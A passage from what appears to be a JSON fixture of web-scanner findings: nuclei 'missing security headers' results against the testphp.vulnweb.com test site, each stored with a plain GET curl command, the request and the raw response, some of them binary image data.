"https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:42:09.188Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 834, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:42:09.370Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 835, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:42:09.556Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 836, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:42:09.740Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 837, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:42:09.924Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 838, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:10.121Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 839, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:42:10.301Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 840, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:42:10.482Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� 